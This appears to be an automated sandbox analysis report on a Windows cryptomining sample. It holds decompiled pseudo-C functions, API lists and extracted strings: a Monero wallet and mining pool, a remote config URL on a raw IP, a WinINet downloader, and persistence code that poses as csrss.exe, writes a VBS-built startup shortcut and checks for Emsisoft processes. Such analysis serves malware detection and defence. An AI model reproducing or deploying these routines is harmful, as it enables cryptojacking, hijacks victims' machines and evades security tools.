                                                                                                        0x01463469
                                                                                                        0x01463476
                                                                                                        0x0146347e
                                                                                                        0x01463484
                                                                                                        0x01463489
                                                                                                        0x01463496
                                                                                                        0x0146349e
                                                                                                        0x014634a4
                                                                                                        0x014634a9
                                                                                                        0x014634b6
                                                                                                        0x014634be
                                                                                                        0x014634c4
                                                                                                        0x014634c9
                                                                                                        0x014634d6
                                                                                                        0x014634e3
                                                                                                        0x014634e9
                                                                                                        0x014634ee
                                                                                                        0x014634fb
                                                                                                        0x01463508
                                                                                                        0x0146350e
                                                                                                        0x01463513
                                                                                                        0x01463520
                                                                                                        0x01463523
                                                                                                        0x01463534
                                                                                                        0x0146353a
                                                                                                        0x0146353f
                                                                                                        0x01463550
                                                                                                        0x0146356a
                                                                                                        0x0146357a
                                                                                                        0x0146358d
                                                                                                        0x01463592
                                                                                                        0x014635a4
                                                                                                        0x014635bb
                                                                                                        0x014635ce
                                                                                                        0x014635dd
                                                                                                        0x01463673
                                                                                                        0x01463673
                                                                                                        0x014635f8
                                                                                                        0x014635fd
                                                                                                        0x01463608
                                                                                                        0x01463617
                                                                                                        0x0146361d
                                                                                                        0x01463626
                                                                                                        0x01463657
                                                                                                        0x01463659
                                                                                                        0x00000000
                                                                                                        0x0146362f
                                                                                                        0x01463639
                                                                                                        0x01463643
                                                                                                        0x0146365f
                                                                                                        0x0146365f
                                                                                                        0x01463666
                                                                                                        0x01463670
                                                                                                        0x01463645
                                                                                                        0x01463645
                                                                                                        0x0146364c
                                                                                                        0x01463656
                                                                                                        0x01463656
                                                                                                        0x01463643

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(75144D40), ref: 01463426
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,00000200), ref: 0146361D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                                        • String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$50%CPU$50%CPU$50%CPU$50%CPU$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$http://45.144.225.135/config.txt$nicehash.com$pool.supportxmr.com:3333$viTRMUuKeV
                                                                                                        • API String ID: 2251294070-616098679
                                                                                                        • Opcode ID: 63a7a97f56231b37feb03491b86da1fcfebadef162383a41090c0d99037acd64
                                                                                                        • Instruction ID: 79ba011eff7c2b42f6b4b98f793f075dbd5f35932ed074bebd9c981619171c11
                                                                                                        • Opcode Fuzzy Hash: 63a7a97f56231b37feb03491b86da1fcfebadef162383a41090c0d99037acd64
                                                                                                        • Instruction Fuzzy Hash: 389126B4B803016AF730AF13DC53F6636A8A7B2F4DF14910EE502A62E5DBF554608B87
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01464B00, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 266networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E01464B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
				void* _v8;
				void _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t54;
				int _t55;
				void* _t61;
				void* _t62;
				void* _t71;
				long _t87;
				char* _t91;
				long _t108;
				void* _t111;
				char* _t118;
				long _t119;
				char* _t123;
				void* _t126;
				void* _t128;
				void* _t134;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t140;

				E01461BB0( &_v108, 0, 0x38);
				_t118 = _a4;
				_v24 = 0;
				_t108 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t54 = E01461850(_t118);
				_t136 = _t134 + 0x10;
				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112);
				if(_t55 != 0) {
					_t123 = E014615E0(_v92 + 1);
					E01461BB0(_t123, 0, _v92 + 1);
					E01461640(_t123, _v96, _v92);
					_t137 = _t136 + 0x1c;
					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v8 = _t61;
					if(_t61 != 0) {
						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0);
						_v20 = _t62;
						_push(_t123);
						if(_t62 != 0) {
							E01461510();
							E014618D0(_t118, "https://");
							_t138 = _t137 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t126 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v16 = _t126;
							if(_t126 == 0) {
								L26:
								InternetCloseHandle(_v20);
								InternetCloseHandle(_v8);
								return 0;
							} else {
								_t71 = E014618D0(_t118, "https://");
								_t139 = _t138 + 8;
								if(_t71 == 0) {
									L10:
									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
										goto L25;
									} else {
										_t119 = 0x400;
										_t128 = E014615E0(0x400);
										_t140 = _t139 + 4;
										if(_t128 == 0) {
											_t126 = _v16;
											goto L25;
										} else {
											do {
												if(InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E01461510(_t128);
														L23:
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														InternetCloseHandle(_v8);
														return 0;
													} else {
														_t119 = _t119 + 0x400;
														goto L17;
													}
												} else {
													_t87 = _v24;
													if(_t87 == 0) {
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														_t111 = _v8;
														InternetCloseHandle(_t111);
														_t91 = E014618D0(_t128, ";End");
														if(_t91 != 0) {
															 *_t91 = 0;
															return _t128;
														} else {
															E01461510(_t128);
															InternetCloseHandle(_v16);
															InternetCloseHandle(_v20);
															InternetCloseHandle(_t111);
															return 0;
														}
													} else {
														_t108 = _t108 + _t87;
														goto L17;
													}
												}
												goto L27;
												L17:
												_t128 = E014616A0(_t128, _t119 + _t108);
												_t140 = _t140 + 8;
											} while (_t128 != 0);
											goto L23;
										}
									}
								} else {
									_v12 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
										L25:
										InternetCloseHandle(_t126);
										goto L26;
									} else {
										_v12 = _v12 | 0x00000180;
										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
											goto L25;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E01461510();
							InternetCloseHandle(_v8);
							return 0;
						}
					} else {
						E01461510(_t123);
						return 0;
					}
				} else {
					return _t55;
				}
				L27:
			}












































                                                                                                        0x01464b10
                                                                                                        0x01464b15
                                                                                                        0x01464b1e
                                                                                                        0x01464b25
                                                                                                        0x01464b27
                                                                                                        0x01464b2e
                                                                                                        0x01464b35
                                                                                                        0x01464b3f
                                                                                                        0x01464b46
                                                                                                        0x01464b4d
                                                                                                        0x01464b52
                                                                                                        0x01464b57
                                                                                                        0x01464b5f
                                                                                                        0x01464b75
                                                                                                        0x01464b7c
                                                                                                        0x01464b88
                                                                                                        0x01464b8d
                                                                                                        0x01464b9d
                                                                                                        0x01464ba3
                                                                                                        0x01464ba8
                                                                                                        0x01464bcb
                                                                                                        0x01464bd1
                                                                                                        0x01464bd4
                                                                                                        0x01464bd7
                                                                                                        0x01464bf4
                                                                                                        0x01464c04
                                                                                                        0x01464c09
                                                                                                        0x01464c0c
                                                                                                        0x01464c15
                                                                                                        0x01464c21
                                                                                                        0x01464c28
                                                                                                        0x01464c2b
                                                                                                        0x01464c38
                                                                                                        0x01464c47
                                                                                                        0x01464c58
                                                                                                        0x01464c5a
                                                                                                        0x01464c5f
                                                                                                        0x01464db8
                                                                                                        0x01464dbb
                                                                                                        0x01464dca
                                                                                                        0x01464dd4
                                                                                                        0x01464c65
                                                                                                        0x01464c6b
                                                                                                        0x01464c70
                                                                                                        0x01464c75
                                                                                                        0x01464cb8
                                                                                                        0x01464cc9
                                                                                                        0x00000000
                                                                                                        0x01464ccf
                                                                                                        0x01464ccf
                                                                                                        0x01464cda
                                                                                                        0x01464cdc
                                                                                                        0x01464ce1
                                                                                                        0x01464dad
                                                                                                        0x00000000
                                                                                                        0x01464ce7
                                                                                                        0x01464ce7
                                                                                                        0x01464cfb
                                                                                                        0x01464d11
                                                                                                        0x01464d86
                                                                                                        0x01464d8e
                                                                                                        0x01464d9a
                                                                                                        0x01464d9f
                                                                                                        0x01464da2
                                                                                                        0x01464dac
                                                                                                        0x01464d13
                                                                                                        0x01464d13
                                                                                                        0x00000000
                                                                                                        0x01464d13
                                                                                                        0x01464cfd
                                                                                                        0x01464cfd
                                                                                                        0x01464d02
                                                                                                        0x01464d31
                                                                                                        0x01464d40
                                                                                                        0x01464d42
                                                                                                        0x01464d46
                                                                                                        0x01464d4e
                                                                                                        0x01464d58
                                                                                                        0x01464d79
                                                                                                        0x01464d84
                                                                                                        0x01464d5a
                                                                                                        0x01464d5b
                                                                                                        0x01464d66
                                                                                                        0x01464d6b
                                                                                                        0x01464d6e
                                                                                                        0x01464d78
                                                                                                        0x01464d78
                                                                                                        0x01464d04
                                                                                                        0x01464d04
                                                                                                        0x00000000
                                                                                                        0x01464d04
                                                                                                        0x01464d02
                                                                                                        0x00000000
                                                                                                        0x01464d19
                                                                                                        0x01464d23
                                                                                                        0x01464d25
                                                                                                        0x01464d28
                                                                                                        0x00000000
                                                                                                        0x01464d2c
                                                                                                        0x01464ce1
                                                                                                        0x01464c77
                                                                                                        0x01464c7a
                                                                                                        0x01464c81
                                                                                                        0x01464c94
                                                                                                        0x01464db0
                                                                                                        0x01464db6
                                                                                                        0x00000000
                                                                                                        0x01464c9a
                                                                                                        0x01464c9a
                                                                                                        0x01464cb2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464cb2
                                                                                                        0x01464c94
                                                                                                        0x01464c75
                                                                                                        0x01464bd9
                                                                                                        0x01464bd9
                                                                                                        0x01464be5
                                                                                                        0x01464bf3
                                                                                                        0x01464bf3
                                                                                                        0x01464baa
                                                                                                        0x01464bab
                                                                                                        0x01464bbb
                                                                                                        0x01464bbb
                                                                                                        0x01464b66
                                                                                                        0x01464b66
                                                                                                        0x01464b66
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • InternetCrackUrlA.WININET(7519EA30,00000000,?,?,00000000,00000000), ref: 01464B57
                                                                                                        • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 01464B9D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CrackOpen
                                                                                                        • String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                        • API String ID: 1262293563-2187584305
                                                                                                        • Opcode ID: ea9e24554e1051ae4cf2f1b153b639cfbe680dd29d4419b6e3faeeb5ac337be5
                                                                                                        • Instruction ID: d95c71e5fe2e27d8be259b3a366befb4b71782b004b118c622d0b3335f7ff76f
                                                                                                        • Opcode Fuzzy Hash: ea9e24554e1051ae4cf2f1b153b639cfbe680dd29d4419b6e3faeeb5ac337be5
                                                                                                        • Instruction Fuzzy Hash: CB81F971E00219ABEB11ABA5EC45FEFBBBCEF5075CF14016AE904F62A0D77159018792
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01467C30, Relevance: 47.5, APIs: 17, Strings: 10, Instructions: 241networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E01467C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
				void _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t53;
				int _t54;
				void* _t62;
				void* _t63;
				void* _t72;
				long _t88;
				long _t103;
				char* _t108;
				intOrPtr _t109;
				char* _t111;
				void* _t114;
				long _t116;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;

				E01461BB0( &_v108, 0, 0x38);
				_t108 = _a4;
				_v24 = 0;
				_t103 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t53 = E01461850(_t108);
				_t125 = _t123 + 0x10;
				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
				if(_t54 != 0) {
					_t111 = E014615E0(_v92 + 1);
					E01461BB0(_t111, 0, _v92 + 1);
					E01461640(_t111, _v96, _v92);
					_t126 = _t125 + 0x1c;
					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v20 = _t62;
					if(_t62 != 0) {
						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
						_v16 = _t63;
						_push(_t111);
						if(_t63 != 0) {
							E01461510();
							E014618D0(_t108, "https://");
							_t127 = _t126 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v12 = _t114;
							if(_t114 == 0) {
								L24:
								InternetCloseHandle(_v16);
								InternetCloseHandle(_v20);
								return 0;
							} else {
								_t72 = E014618D0(_t108, "https://");
								_t128 = _t127 + 8;
								if(_t72 == 0) {
									L10:
									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
										goto L23;
									} else {
										_t116 = 0x400;
										_t109 = E014615E0(0x400);
										_t129 = _t128 + 4;
										if(_t109 == 0) {
											_t114 = _v12;
											goto L23;
										} else {
											do {
												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E01461510(_t109);
														L21:
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														return 0;
													} else {
														_t116 = _t116 + 0x400;
														goto L15;
													}
												} else {
													_t88 = _v24;
													if(_t88 == 0) {
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														 *_a8 = _t109;
														return _t103;
													} else {
														_t103 = _t103 + _t88;
														goto L15;
													}
												}
												goto L25;
												L15:
												_t109 = E014616A0(_t109, _t116 + _t103);
												_t129 = _t129 + 8;
											} while (_t109 != 0);
											goto L21;
										}
									}
								} else {
									_v8 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
										L23:
										InternetCloseHandle(_t114);
										goto L24;
									} else {
										_v8 = _v8 | 0x00000180;
										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
											goto L23;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E01461510();
							InternetCloseHandle(_v20);
							return 0;
						}
					} else {
						E01461510(_t111);
						return 0;
					}
				} else {
					return _t54;
				}
				L25:
			}










































                                                                                                        0x01467c40
                                                                                                        0x01467c45
                                                                                                        0x01467c4e
                                                                                                        0x01467c55
                                                                                                        0x01467c57
                                                                                                        0x01467c5e
                                                                                                        0x01467c65
                                                                                                        0x01467c6f
                                                                                                        0x01467c76
                                                                                                        0x01467c7d
                                                                                                        0x01467c82
                                                                                                        0x01467c87
                                                                                                        0x01467c8f
                                                                                                        0x01467ca2
                                                                                                        0x01467cac
                                                                                                        0x01467cb8
                                                                                                        0x01467cbd
                                                                                                        0x01467ccd
                                                                                                        0x01467cd3
                                                                                                        0x01467cd8
                                                                                                        0x01467cfb
                                                                                                        0x01467d01
                                                                                                        0x01467d04
                                                                                                        0x01467d07
                                                                                                        0x01467d23
                                                                                                        0x01467d33
                                                                                                        0x01467d38
                                                                                                        0x01467d3b
                                                                                                        0x01467d44
                                                                                                        0x01467d50
                                                                                                        0x01467d57
                                                                                                        0x01467d5a
                                                                                                        0x01467d67
                                                                                                        0x01467d76
                                                                                                        0x01467d87
                                                                                                        0x01467d89
                                                                                                        0x01467d8e
                                                                                                        0x01467eb2
                                                                                                        0x01467eb5
                                                                                                        0x01467ec3
                                                                                                        0x01467ecd
                                                                                                        0x01467d94
                                                                                                        0x01467d9a
                                                                                                        0x01467d9f
                                                                                                        0x01467da4
                                                                                                        0x01467de7
                                                                                                        0x01467df8
                                                                                                        0x00000000
                                                                                                        0x01467dfe
                                                                                                        0x01467dfe
                                                                                                        0x01467e09
                                                                                                        0x01467e0b
                                                                                                        0x01467e10
                                                                                                        0x01467ea7
                                                                                                        0x00000000
                                                                                                        0x01467e16
                                                                                                        0x01467e16
                                                                                                        0x01467e2a
                                                                                                        0x01467e53
                                                                                                        0x01467e81
                                                                                                        0x01467e89
                                                                                                        0x01467e92
                                                                                                        0x01467e97
                                                                                                        0x01467e9c
                                                                                                        0x01467ea6
                                                                                                        0x01467e55
                                                                                                        0x01467e55
                                                                                                        0x00000000
                                                                                                        0x01467e55
                                                                                                        0x01467e2c
                                                                                                        0x01467e2c
                                                                                                        0x01467e31
                                                                                                        0x01467e66
                                                                                                        0x01467e6b
                                                                                                        0x01467e70
                                                                                                        0x01467e78
                                                                                                        0x01467e7f
                                                                                                        0x01467e33
                                                                                                        0x01467e33
                                                                                                        0x00000000
                                                                                                        0x01467e33
                                                                                                        0x01467e31
                                                                                                        0x00000000
                                                                                                        0x01467e35
                                                                                                        0x01467e3f
                                                                                                        0x01467e41
                                                                                                        0x01467e44
                                                                                                        0x00000000
                                                                                                        0x01467e48
                                                                                                        0x01467e10
                                                                                                        0x01467da6
                                                                                                        0x01467da9
                                                                                                        0x01467db0
                                                                                                        0x01467dc3
                                                                                                        0x01467eaa
                                                                                                        0x01467eb0
                                                                                                        0x00000000
                                                                                                        0x01467dc9
                                                                                                        0x01467dc9
                                                                                                        0x01467de1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01467de1
                                                                                                        0x01467dc3
                                                                                                        0x01467da4
                                                                                                        0x01467d09
                                                                                                        0x01467d09
                                                                                                        0x01467d14
                                                                                                        0x01467d22
                                                                                                        0x01467d22
                                                                                                        0x01467cda
                                                                                                        0x01467cdb
                                                                                                        0x01467ceb
                                                                                                        0x01467ceb
                                                                                                        0x01467c96
                                                                                                        0x01467c96
                                                                                                        0x01467c96
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 01467C87
                                                                                                        • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01467CCD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CrackOpen
                                                                                                        • String ID: <$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                        • API String ID: 1262293563-3953569400
                                                                                                        • Opcode ID: 5fbe5cac426734d5f1fa57e66ff7e9978334329dd9a89821fa697274404da596
                                                                                                        • Instruction ID: 11af624277f397a0418d57875e2f0583f327e64c4b42536d4f0cd0793b672a57
                                                                                                        • Opcode Fuzzy Hash: 5fbe5cac426734d5f1fa57e66ff7e9978334329dd9a89821fa697274404da596
                                                                                                        • Instruction Fuzzy Hash: F671C671E00209AFEB119FA5DC45BEEBBBCEF4076DF20012BE904F62A0D77159058B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 014665D0, Relevance: 40.5, APIs: 5, Strings: 18, Instructions: 212sleepfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E014665D0(void* __eflags) {
				short _v524;
				short _v1044;
				short _v1564;
				char _v2588;
				char _v3612;
				char _v4636;
				void* _t61;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t128;
				void* _t134;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t150;

				E01461A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
				E01461970( &_v524, "\\");
				E01461970( &_v524, "csrss.exe");
				 *((short*)(_t141 + E01461B40( &_v524) * 2 - 0x210)) = 0;
				E01461A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
				E01461970( &_v1044, L"\\r.vbs");
				_t61 = E01467FA0(0,  &_v3612, 0x146aad0, 7);
				_t143 = _t142 + 0x38;
				if(_t61 != 0) {
					E01461970( &_v3612, "\\");
					E01461970( &_v3612, "viTRMUuKeV");
					E01461970( &_v3612, L".url");
					_t69 = E01466340( &_v524);
					_t144 = _t143 + 0x1c;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L1;
					} else {
						_t71 = E01467EF0("a2guard.exe");
						_t145 = _t144 + 4;
						__eflags = _t71;
						if(_t71 != 0) {
							L10:
							_t73 = E01467ED0( &_v3612);
							_t146 = _t145 + 4;
							__eflags = _t73;
							if(_t73 != 0) {
								goto L13;
							} else {
								E01461A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
								E01461970( &_v4636,  &_v524);
								E01461970( &_v4636, L".exe\"");
								_t100 = E01467AF0( &_v3612,  &_v4636);
								_t146 = _t146 + 0x20;
								__eflags = _t100;
								if(_t100 != 0) {
									goto L13;
								} else {
									goto L12;
								}
							}
						} else {
							_t102 = E01467EF0("a2service.exe");
							_t145 = _t145 + 4;
							__eflags = _t102;
							if(_t102 != 0) {
								goto L10;
							} else {
								_t103 = E01467EF0("a2start.exe");
								_t145 = _t145 + 4;
								__eflags = _t103;
								if(_t103 != 0) {
									goto L10;
								} else {
									_t105 = E01467ED0( &_v3612);
									_t146 = _t145 + 4;
									__eflags = _t105;
									if(_t105 != 0) {
										L13:
										E01466990( &_v3612);
										E01461A00( &_v1564,  &_v524);
										E01461970( &_v1564, L".exe");
										DeleteFileW( &_v1564);
										MoveFileW( &_v524,  &_v1564);
										E014668E0( &_v1564);
										DeleteFileW( &_v524);
										return 1;
									} else {
										E01461A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
										E01461970( &_v2588, L"outFile=\"");
										E01461970( &_v2588,  &_v3612);
										E01461970( &_v2588, L"\"\r\n");
										E01461970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
										E01461970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
										E01461970( &_v2588,  &_v524);
										E01461970( &_v2588, L".exe\"\"\"\r\n");
										E01461970( &_v2588, L"objFile.Close\r\n");
										_t128 = E01467AF0( &_v1044,  &_v2588);
										_t150 = _t146 + 0x50;
										__eflags = _t128;
										if(__eflags == 0) {
											L12:
											__eflags = 0;
											return 0;
										} else {
											E01466A40(0, __eflags,  &_v1044);
											Sleep(0xbb8);
											DeleteFileW( &_v1044);
											_t134 = E01467ED0( &_v3612);
											_t146 = _t150 + 8;
											__eflags = _t134;
											if(_t134 != 0) {
												goto L13;
											} else {
												return _t134;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}


























                                                                                                        0x014665e5
                                                                                                        0x014665f6
                                                                                                        0x01466607
                                                                                                        0x0146661f
                                                                                                        0x0146662e
                                                                                                        0x0146663f
                                                                                                        0x01466652
                                                                                                        0x01466657
                                                                                                        0x0146665c
                                                                                                        0x01466670
                                                                                                        0x01466681
                                                                                                        0x01466692
                                                                                                        0x0146669e
                                                                                                        0x014666a3
                                                                                                        0x014666a6
                                                                                                        0x014666a8
                                                                                                        0x00000000
                                                                                                        0x014666aa
                                                                                                        0x014666b0
                                                                                                        0x014666bb
                                                                                                        0x014666be
                                                                                                        0x014666c0
                                                                                                        0x01466800
                                                                                                        0x01466807
                                                                                                        0x0146680c
                                                                                                        0x0146680f
                                                                                                        0x01466811
                                                                                                        0x00000000
                                                                                                        0x01466813
                                                                                                        0x0146681f
                                                                                                        0x01466832
                                                                                                        0x01466843
                                                                                                        0x01466856
                                                                                                        0x0146685b
                                                                                                        0x0146685e
                                                                                                        0x01466860
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01466860
                                                                                                        0x014666c6
                                                                                                        0x014666cb
                                                                                                        0x014666d0
                                                                                                        0x014666d3
                                                                                                        0x014666d5
                                                                                                        0x00000000
                                                                                                        0x014666db
                                                                                                        0x014666e0
                                                                                                        0x014666e5
                                                                                                        0x014666e8
                                                                                                        0x014666ea
                                                                                                        0x00000000
                                                                                                        0x014666f0
                                                                                                        0x014666f7
                                                                                                        0x014666fc
                                                                                                        0x014666ff
                                                                                                        0x01466701
                                                                                                        0x01466869
                                                                                                        0x01466870
                                                                                                        0x01466883
                                                                                                        0x01466894
                                                                                                        0x014668a3
                                                                                                        0x014668b3
                                                                                                        0x014668c0
                                                                                                        0x014668cf
                                                                                                        0x014668da
                                                                                                        0x01466707
                                                                                                        0x01466713
                                                                                                        0x01466724
                                                                                                        0x01466737
                                                                                                        0x01466748
                                                                                                        0x01466759
                                                                                                        0x0146676a
                                                                                                        0x0146677d
                                                                                                        0x0146678e
                                                                                                        0x014667a2
                                                                                                        0x014667b5
                                                                                                        0x014667ba
                                                                                                        0x014667bd
                                                                                                        0x014667bf
                                                                                                        0x01466862
                                                                                                        0x01466862
                                                                                                        0x01466868
                                                                                                        0x014667c5
                                                                                                        0x014667cc
                                                                                                        0x014667d9
                                                                                                        0x014667e6
                                                                                                        0x014667ef
                                                                                                        0x014667f4
                                                                                                        0x014667f7
                                                                                                        0x014667f9
                                                                                                        0x00000000
                                                                                                        0x014667fb
                                                                                                        0x014667ff
                                                                                                        0x014667ff
                                                                                                        0x014667f9
                                                                                                        0x014667bf
                                                                                                        0x01466701
                                                                                                        0x014666ea
                                                                                                        0x014666d5
                                                                                                        0x014666c0
                                                                                                        0x0146665e
                                                                                                        0x0146665e
                                                                                                        0x01466663
                                                                                                        0x01466663

                                                                                                        APIs
                                                                                                          • Part of subcall function 01467FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FAA
                                                                                                          • Part of subcall function 01467FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FBC
                                                                                                          • Part of subcall function 01467FA0: CoTaskMemFree.OLE32(00000000,0146AAE0), ref: 01467FEF
                                                                                                          • Part of subcall function 01467FA0: FreeLibrary.KERNEL32(00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FF6
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 014667D9
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 014667E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
                                                                                                        • String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
                                                                                                        • API String ID: 976351581-227138989
                                                                                                        • Opcode ID: 671f31387eb76ffe7eedd1e7a5d421db0a94a72204410f49f2046076568151df
